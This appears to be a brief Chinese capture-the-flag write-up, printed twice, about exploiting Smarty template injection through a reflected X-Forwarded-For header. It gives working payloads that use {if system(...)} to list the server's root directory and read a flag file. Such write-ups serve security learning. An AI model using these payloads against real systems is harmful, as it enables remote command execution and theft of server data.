注意到了banner中信息说是smarty
,并且将XFF
输出到页面
直接尝试Smarty
模板注入
{$smarty.version}
Smarty3官方手册:https://www.smarty.net/docs/zh_CN/language.function.if.tpl
{if system('ls -lha /')}{/if}
{if system('cat /flag')}{/if}
注意到了banner中信息说是smarty
,并且将XFF
输出到页面
直接尝试Smarty
模板注入
{$smarty.version}
Smarty3官方手册:https://www.smarty.net/docs/zh_CN/language.function.if.tpl
{if system('ls -lha /')}{/if}
{if system('cat /flag')}{/if}